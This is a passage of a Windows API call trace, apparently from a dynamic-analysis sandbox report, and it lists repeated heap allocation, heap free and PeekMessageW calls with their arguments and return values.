(HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff078 [0122.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3d0 [0122.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef850 [0122.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd478 [0122.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd670 [0122.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x40) returned 0x14a3460 [0122.570] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0122.570] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0122.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd568 | out: hHeap=0x12c0000) returned 1 [0122.570] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0122.571] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0122.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef870 [0122.571] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd6a0 | out: hHeap=0x12c0000) returned 1 [0122.571] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef870 | out: hHeap=0x12c0000) returned 1 [0122.571] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff3c0 [0122.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd6a0 [0122.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef870 [0122.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd3e8 [0122.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0122.571] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0122.571] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0122.572] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0122.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c18 [0122.572] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef890 [0122.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6d0 [0122.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b18 [0122.572] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b18 | out: hHeap=0x12c0000) returned 1 [0122.572] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0122.572] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef890 | out: hHeap=0x12c0000) returned 1 [0122.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a18 [0122.572] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.572] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff410 [0122.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0122.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef700 [0122.573] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd4f0 | out: hHeap=0x12c0000) returned 1 [0122.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff3e8 [0122.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd4f0 [0122.573] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd508 [0122.574] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0a0 [0122.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0122.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef890 [0122.574] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0122.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x30) returned 0x1300ce8 [0122.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd568 [0122.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0122.574] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6d0 [0122.574] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0122.574] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0122.574] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0122.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0122.575] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff0c8 [0122.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0122.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6d0 [0122.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0122.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0122.575] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6d0 [0122.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0122.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd520 | out: hHeap=0x12c0000) returned 1 [0122.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd538 | out: hHeap=0x12c0000) returned 1 [0122.575] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff0c8 | out: hHeap=0x12c0000) returned 1 [0122.576] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a18 | out: hHeap=0x12c0000) returned 1 [0122.576] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6d0 [0122.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0122.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ad8 [0122.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ad8 | out: hHeap=0x12c0000) returned 1 [0122.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0122.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0122.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c58 [0122.576] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.576] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0122.576] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6d0 [0122.576] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0122.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b58 [0122.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b58 | out: hHeap=0x12c0000) returned 1 [0122.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0122.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0122.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a18 [0122.577] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a18 | out: hHeap=0x12c0000) returned 1 [0122.577] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6d0 [0122.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0122.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0122.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0122.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0122.577] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0122.577] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0122.578] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458858 | out: hHeap=0x12c0000) returned 1 [0122.578] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0122.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6d0 [0122.578] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14918d8 [0122.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14918d8 | out: hHeap=0x12c0000) returned 1 [0122.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0122.578] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.580] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458a98 [0122.580] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458a98 | out: hHeap=0x12c0000) returned 1 [0122.581] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6d0 [0122.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0122.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ad8 [0122.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ad8 | out: hHeap=0x12c0000) returned 1 [0122.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0122.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0122.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458ed8 [0122.581] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458ed8 | out: hHeap=0x12c0000) returned 1 [0122.581] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6d0 [0122.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0122.581] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0122.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0122.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0122.581] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0122.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c58 [0122.582] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0122.582] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6d0 [0122.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0122.582] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491ab8 [0122.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491ab8 | out: hHeap=0x12c0000) returned 1 [0122.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0122.582] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6d0 | out: hHeap=0x12c0000) returned 1 [0122.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458cd8 [0122.583] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff460 [0122.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd520 [0122.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef6d0 [0122.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd538 [0122.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd550 [0122.583] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.583] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0122.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0122.583] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.583] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458cd8 | out: hHeap=0x12c0000) returned 1 [0122.583] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0122.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0122.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917f8 [0122.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917f8 | out: hHeap=0x12c0000) returned 1 [0122.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0122.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0122.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x14589d8 [0122.584] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.584] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14589d8 | out: hHeap=0x12c0000) returned 1 [0122.584] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.584] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0122.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0122.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b58 [0122.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b58 | out: hHeap=0x12c0000) returned 1 [0122.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0122.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0122.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458c58 [0122.585] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.585] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458c58 | out: hHeap=0x12c0000) returned 1 [0122.585] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0122.585] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0122.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491858 [0122.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491858 | out: hHeap=0x12c0000) returned 1 [0122.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0122.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0122.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458cd8 [0122.586] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458cd8 | out: hHeap=0x12c0000) returned 1 [0122.586] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff1b8 [0122.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd838 [0122.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0122.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0122.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491b98 [0122.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef730 [0122.586] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14919d8 [0122.586] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef730 | out: hHeap=0x12c0000) returned 1 [0122.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14919d8 | out: hHeap=0x12c0000) returned 1 [0122.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491b98 | out: hHeap=0x12c0000) returned 1 [0122.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0122.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0122.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd760 [0122.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x20) returned 0x12ff438 [0122.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x4) returned 0x12ef720 [0122.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x10) returned 0x14bd778 [0122.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd760 | out: hHeap=0x12c0000) returned 1 [0122.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd838 | out: hHeap=0x12c0000) returned 1 [0122.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff1b8 | out: hHeap=0x12c0000) returned 1 [0122.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ff438 | out: hHeap=0x12c0000) returned 1 [0122.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0122.587] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14bd778 | out: hHeap=0x12c0000) returned 1 [0122.587] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.587] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0122.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0122.587] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x14917d8 [0122.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x14917d8 | out: hHeap=0x12c0000) returned 1 [0122.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0122.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0122.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458cd8 [0122.588] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1458cd8 | out: hHeap=0x12c0000) returned 1 [0122.588] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef6e0 [0122.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x8) returned 0x12ef720 [0122.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x18) returned 0x1491958 [0122.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x1491958 | out: hHeap=0x12c0000) returned 1 [0122.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef720 | out: hHeap=0x12c0000) returned 1 [0122.588] HeapFree (in: hHeap=0x12c0000, dwFlags=0x0, lpMem=0x12ef6e0 | out: hHeap=0x12c0000) returned 1 [0122.588] RtlAllocateHeap (HeapHandle=0x12c0000, Flags=0x0, Size=0x38) returned 0x1458858 [0122.589] PeekMessageW (in: lpMsg=0x7df524, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x7df524) returned 0 [0122.589] 